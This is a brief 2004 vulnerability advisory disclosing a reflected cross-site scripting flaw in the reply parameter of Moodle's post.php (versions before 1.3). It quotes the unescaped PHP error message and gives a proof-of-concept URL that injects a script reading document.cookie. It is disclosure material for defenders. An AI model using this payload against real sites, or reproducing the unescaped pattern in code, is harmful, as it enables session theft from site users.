+--------------------------------+

| |

| XSS in Moodle < 1.3 (post.php) |

| |

+--------------------------------+

Autor: Javier Ubilla Brenni <javierubilla[at]spymac.com>

Date: 02/08/04

Software Description:

~~~~~~~~~~~~~~~~~~~~

"Moodle is a course management system (CMS) - a software package designed to help educators create quality online courses."

www.moodle.org

Bug:

~~~

Post.php is vulnerable to an XXS attack.

The bug was found in the $reply variable :

/* Begin of vulnerable code */

} else if (isset($reply)) { // User is writing a new reply

if (! $parent = forum_get_post_full($reply)) {

error("Parent post ID was incorrect ($reply)");

}

if (! $discussion = get_record("forum_discussions", "id", $parent->discussion)) {

error("This post is not part of a discussion! ($reply)");

}

if (! $forum = get_record("forum", "id", $discussion->forum)) {

error("The forum number was incorrect ($discussion->forum)");

}

if (! $course = get_record("course", "id", $discussion->course)) {

error("The course number was incorrect ($discussion->course)");

}

if (! forum_user_can_post($forum)) {

error("Sorry, but you can not post in this forum.");

}

if ($cm = get_coursemodule_from_instance("forum", $forum->id, $course->id)) {

if (groupmode($course, $cm) and !isteacheredit($course->id)) { // Make sure user can post here

if (mygroupid($course->id) != $discussion->groupid) {

error("Sorry, but you can not post in this discussion.");

}

}

if (!$cm->visible and !isteacher($course->id)) {

error(get_string("activityiscurrentlyhidden"));

}

}

/* End of vulnerable code */

Here is the bug:

if (! $parent = forum_get_post_full($reply)) {

error("Parent post ID was incorrect ($reply)");

Exploit:

~~~~~~~~

http://www.vulnerable.com/moodle/mod/forum/post.php?reply=%3Cscript%3Eal
ert(document.cookie);%3C/script%3E

Solution:

~~~~~~~~~

Upgrade to the last version

Vendor Status:

~~~~~~~~~~~~~~

Notified.

Credits: Bug found by Javier Ubilla and Ariel.

~~~~~~~

[ reply ]